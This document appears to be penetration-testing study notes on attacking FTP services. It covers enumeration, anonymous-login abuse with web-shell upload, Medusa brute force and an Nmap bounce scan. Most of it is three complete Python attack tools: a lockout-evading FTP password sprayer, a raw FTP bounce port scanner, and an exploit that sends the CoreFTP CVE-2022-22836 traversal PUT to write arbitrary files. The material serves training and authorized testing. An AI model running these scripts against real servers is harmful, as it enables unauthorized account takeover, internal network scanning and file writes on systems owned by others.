☑️FTP - 21

Enumeration

Nmap's default scripts (-sC) include the ftp-anon script, which checks whether an FTP server allows anonymous logins and, if it does, lists the directory the session lands in. The version flag -sV grabs the FTP banner, which often includes the server software and version.

Interaction: We can use the ftp client or nc to talk to the service by hand. By default, FTP listens on TCP port 21.

sudo nmap -sC -sV -p 21 192.168.2.142

Misconfiguration (anonymous login): log in with the username anonymous and a blank (or any) password. If the FTP root is also served by a web server and the anonymous account may upload, we can upload a web shell and execute it by requesting it through the web server.

Attacks

Brute-Force

If anonymous login isn't enabled, we can try brute forcing. Medusa takes -u for a single username, -U for a username list, -p for a single password, -P for a password list, -h for the target host and -M for the module (the protocol, here ftp).

Note: Although we may find services vulnerable to brute force, most services now rate-limit or lock an account after a handful of failed logins. Password Spraying, trying one password (or a few) across many usernames with a pause between rounds, is more effective and far less likely to trigger lockouts.

medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
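A lockout-aware spray loop, as an added example that is not part of the original page or of Medusa: one password is tried across every user before the next password is started, a pause separates the rounds, and the run stops as soon as a configurable number of accounts report a lockout. The host 10.129.203.7 and the user fiona are the page's; the other usernames and both passwords are constructed, and the login function is injectable so the logic can be exercised without a live server.

```python
"""Lockout-aware FTP password spraying (added example, not from the original page).

Brute force throws many passwords at one account and trips lockouts; spraying tries
one password against many accounts and waits between rounds. The network path uses
the standard library's ftplib; `try_login` is injectable so the loop can be tested
without a server. Host, usernames and passwords below are constructed placeholders.
"""
import ftplib
import socket
import time
from typing import Callable, Dict, Iterable, Set

TARGET = "10.129.203.7"                                   # page's lab host (assumed)
USERS = ["fiona", "admin", "ftpuser", "backup"]           # constructed user list
PASSWORDS = ["Winter2024!", "Password123"]               # constructed spray list


def ftp_login(host: str, user: str, password: str, port: int = 21,
              timeout: float = 5.0) -> str:
    """Attempt one FTP login. Returns 'ok', 'fail', 'locked' or 'error'."""
    try:
        with ftplib.FTP() as ftp:
            ftp.connect(host, port, timeout=timeout)
            ftp.login(user, password)
            return "ok"
    except ftplib.error_perm as exc:
        # 530 is the generic "not logged in" reply; servers that lock accounts
        # usually say so in the text, so treat that wording as a lockout signal.
        text = str(exc).lower()
        if "lock" in text or "too many" in text:
            return "locked"
        return "fail"
    except (socket.error, EOFError, ftplib.error_temp):
        # 421 or a dropped socket after repeated attempts is a throttling hint.
        return "error"


def spray(users: Iterable[str], passwords: Iterable[str],
          try_login: Callable[[str, str], str],
          delay_between_rounds: float = 0.0,
          max_locked: int = 1) -> Dict[str, str]:
    """Try each password across every user before moving on to the next password.

    Stops as soon as `max_locked` accounts report a lockout, so a bad wordlist does
    not lock out the whole user base. Returns {user: password} for every hit.
    """
    users = list(users)
    found: Dict[str, str] = {}
    locked: Set[str] = set()
    for rnd, password in enumerate(passwords):
        if rnd and delay_between_rounds:
            time.sleep(delay_between_rounds)          # outlast the lockout window
        for user in users:
            if user in found or user in locked:
                continue                              # never hammer a known account
            result = try_login(user, password)
            if result == "ok":
                found[user] = password
            elif result == "locked":
                locked.add(user)
                if len(locked) >= max_locked:
                    return found                      # stop before more damage
    return found


if __name__ == "__main__":
    hits = spray(USERS, PASSWORDS,
                 lambda u, p: ftp_login(TARGET, u, p),
                 delay_between_rounds=60.0)
    for user, password in hits.items():
        print(f"[+] {user}:{password}")
```

The delay between rounds should be longer than the target's lockout observation window; 60 seconds is a placeholder, not a recommendation for any particular server.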

FTP Bounce Attack

An FTP bounce attack abuses an FTP server as a relay to reach other hosts on its network. In active mode the client sends a PORT command naming the address and port the server should open its data connection to. If the server accepts an address other than the client's own, the attacker can point the data connection at a third host and read from the server's replies whether that port accepted the connection, port-scanning (or even delivering data to) machines the attacker cannot reach directly.

Nmap's -b flag performs the scan through such a server; its argument has the form <user>:<pass>@<ftp-host>[:port]. Here 172.17.0.2 is scanned through the FTP server 10.10.110.213:

anonmak9@htb[/htb]$ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:password@10.10.110.213:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.

PORT   STATE  SERVICE
80/tcp open http

<SNIP>

Modern FTP servers refuse, by default, a PORT command whose address differs from the peer of the control connection (vsftpd's port_promiscuous=NO, ProFTPD's AllowForeignAddress off), answering with a 500-series error such as 500 Illegal PORT command, so the bounce fails before any scan happens. Only when an administrator disables that check does the server become usable as a relay. A quick manual check is to log in, send a PORT naming an unrelated address, and see whether the reply is 200 or 500.
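The exchange that Nmap -b drives, as an added example that is not part of the original page or of Nmap: it logs in, sends a PORT naming the inner host, issues a LIST to force the data connection, and reads the server's replies to decide whether the port is open, closed, or whether the server refuses to act as a proxy at all. The hosts and the anonymous:password credentials are the page's lab values; the reply codes it relies on (200 and 500 to PORT, 150 and 425 after LIST) are vsFTPd's and are an assumption for other servers.

```python
"""FTP bounce scan over a raw control connection (added example; not from the
original page or from Nmap).

The whole attack is the PORT command: the client names the address the server must
connect its data channel to. A server that accepts a third-party address tries to
reach it when the next transfer starts and reports the outcome, so a port on the
inner host 172.17.0.2 can be probed through 10.10.110.213. Lab addresses and the
anonymous:password login are the page's; reply texts follow vsFTPd.
"""
import socket
from typing import Callable, Dict, Iterable, List


def port_argument(host: str, port: int) -> str:
    """Encode host/port in the h1,h2,h3,h4,p1,p2 form used by PORT (RFC 959)."""
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    octets = host.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) < 256 for o in octets):
        raise ValueError("PORT carries IPv4 addresses only")
    return f"PORT {','.join(octets)},{port // 256},{port % 256}"


def read_reply(readline: Callable[[], bytes]) -> str:
    """Read one FTP reply; multi-line replies run from 'ddd-' to a final 'ddd '."""
    lines: List[str] = []
    while True:
        raw = readline()
        if not raw:
            raise EOFError("control connection closed")
        line = raw.decode("latin-1", "replace").rstrip("\r\n")
        lines.append(line)
        if line[:3].isdigit() and (len(line) == 3 or line[3] == " "):
            return "\n".join(lines)


def classify(port_reply: str, list_reply: str) -> str:
    """Map the replies to PORT and to the following LIST onto a port state.

    500/501 to PORT: the server enforces the same-address check (no bounce).
    After LIST, 150 means the data connection to the target was established
    (open); 425 means the server could not connect (closed or filtered).
    """
    if port_reply[:3] in ("500", "501"):
        return "proxy-refused"
    if not port_reply.startswith("200"):
        return "unknown"
    if list_reply.startswith("150"):
        return "open"
    if list_reply.startswith("425"):
        return "closed"
    return "unknown"


def bounce_scan(ftp_host: str, target: str, ports: Iterable[int],
                user: str = "anonymous", password: str = "password",
                ftp_port: int = 21, timeout: float = 10.0) -> Dict[int, str]:
    """Log in to ftp_host and probe each port on target through its data channel."""
    results: Dict[int, str] = {}
    with socket.create_connection((ftp_host, ftp_port), timeout=timeout) as sock:
        rfile = sock.makefile("rb")

        def cmd(line: str) -> str:
            sock.sendall((line + "\r\n").encode("ascii"))
            return read_reply(rfile.readline)

        read_reply(rfile.readline)                  # 220 banner
        cmd(f"USER {user}")                         # 331 please specify password
        if not cmd(f"PASS {password}").startswith("230"):
            raise PermissionError("FTP login refused")
        for port in ports:
            port_reply = cmd(port_argument(target, port))
            list_reply = cmd("LIST") if port_reply.startswith("200") else ""
            if list_reply.startswith("150"):
                read_reply(rfile.readline)          # 226 or 426 closing the transfer
            results[port] = classify(port_reply, list_reply)
            if results[port] == "proxy-refused":
                break                               # the check is on; stop early
        cmd("QUIT")
    return results


if __name__ == "__main__":
    for port, state in bounce_scan("10.10.110.213", "172.17.0.2", [22, 80, 443]).items():
        print(f"{port}/tcp {state}")
```

A "proxy-refused" result on the first port is the same-address check described above doing its job; there is nothing further to scan through that server.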

Latest Vulnerabilities

CoreFTP Server before build 727 is affected by CVE-2022-22836. Its HTTP/HTTPS interface does not correctly validate the path of an HTTP PUT request, which gives an authenticated user a directory/path traversal and, through it, an arbitrary file write.

This lets an authenticated user write files outside the directory the account is supposed to be confined to.

The Concept of the Attack

The web interface of this FTP service uploads files with an HTTP POST request. However, CoreFTP also accepts an HTTP PUT request, which we can use to write content to a file at a path of our choosing. The exploit is simple:

We send a raw HTTP PUT request (-X PUT) with basic auth (--basic -u <username>:<password>), a traversal path that curl must send unnormalised (--path-as-is https://<IP>/../../../../../whoops), and the file's content (--data-binary "PoC."). Additionally, we set the Host header (-H "Host: <IP>") to the IP address of our target system.

In short, the service misinterprets the user-supplied path: the ../ sequences are honoured, so the check that confines the account to its folder is bypassed, and because write permission on PUT is not enforced beyond that folder, we can create the files we want wherever the service's own account can write. We skip the Basic Auth exchange and jump directly to the first part of the exploit.
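The same request built by hand, as an added example that is not the page's or CoreFTP's code: it serialises the PUT with the traversal path verbatim (the equivalent of --path-as-is), adds the Basic Authorization header that --basic -u produces, and can send it over TLS and read the status line back. The curl line in the docstring is reconstructed from the flags listed above; the target address, the user coreftp, the password, and disabling certificate verification for a lab host with a self-signed certificate are all assumptions.

```python
"""Raw HTTP PUT with an unnormalised traversal path (added example; not the page's
or CoreFTP's code).

Equivalent to the curl invocation the text describes (reconstructed from the flags
listed above; -k assumed for a self-signed lab certificate):

    curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> \
         --data-binary "PoC." --path-as-is "https://<IP>/../../../../../whoops"

The point of --path-as-is is that the client must not collapse the ../ segments
before sending; this builder writes the request-target exactly as given.
"""
import base64
import socket
import ssl
from typing import Tuple


def build_put_request(host: str, path: str, user: str, password: str,
                      body: bytes) -> bytes:
    """Serialise a minimal HTTP/1.1 PUT whose request-target is sent verbatim.

    No '..' normalisation is performed here; that is the whole point of the test.
    """
    if not path.startswith("/"):
        raise ValueError("path must be in origin-form (start with '/')")
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    head = (
        f"PUT {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Authorization: Basic {token}\r\n"
        f"Content-Type: application/octet-stream\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    )
    return head.encode("ascii") + body


def parse_status(response: bytes) -> Tuple[int, str]:
    """Return (status code, reason phrase) from the first line of an HTTP response."""
    first = response.split(b"\r\n", 1)[0].decode("latin-1")
    parts = first.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError(f"not an HTTP status line: {first!r}")
    return int(parts[1]), (parts[2] if len(parts) == 3 else "")


def send_raw(host: str, request: bytes, port: int = 443, timeout: float = 10.0,
             verify_tls: bool = False) -> bytes:
    """Send the pre-built request over TLS and return the full response bytes."""
    ctx = ssl.create_default_context()
    if not verify_tls:                       # assumption: self-signed lab certificate
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(request)
            chunks = []
            while True:
                data = tls.recv(4096)
                if not data:
                    break
                chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    TARGET = "192.168.2.150"                                  # placeholder target
    req = build_put_request(TARGET, "/../../../../../whoops",
                            "coreftp", "Secret1!", b"PoC.")   # placeholder creds
    code, reason = parse_status(send_raw(TARGET, req))
    print(code, reason)
```

Python's http.client would also leave the path untouched, but building the bytes by hand makes it obvious on the wire that the ../ segments were never collapsed, which is the first thing to verify when a traversal "doesn't work".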

Directory Traversal

Step | Directory Traversal | Concept of Attacks - Category
1. | The user specifies the type of HTTP request and the file's content, including the escape sequences (../) that break out of the restricted area. | Source
2. | The changed request type, the file contents and the path entered by the user are accepted and processed by the service. | Process
3. | The application checks whether the user is authorized to be in the specified path. Since the restriction applies only to one specific folder, the permissions granted for it are bypassed as soon as the path breaks out of that folder through the directory traversal. | Privileges
4. | The destination is another process whose task is to write the user-specified contents to the local file system. | Destination

Up to this point we have bypassed the constraints imposed by the application using the escape sequences (../../../../) and arrive at the second part, where the process writes the contents we specify to a file of our choice. The cycle starts over, but this time it writes contents to the target system.

Arbitrary File Write

Step | Arbitrary File Write | Concept of Attacks - Category
5. | The same information the user entered is used as the source: in this case the filename (whoops) and the contents (--data-binary "PoC."). | Source
6. | The process takes the specified information and proceeds to write the desired content to the specified file. | Process
7. | Since all restrictions were bypassed during the directory traversal, the service approves writing the contents to the specified file. | Privileges
8. | The filename specified by the user (whoops) with the desired content ("PoC.") now serves as the destination on the local system. | Destination

After the request completes, the file with the corresponding contents can be found on the target system, outside the folder the account was restricted to.
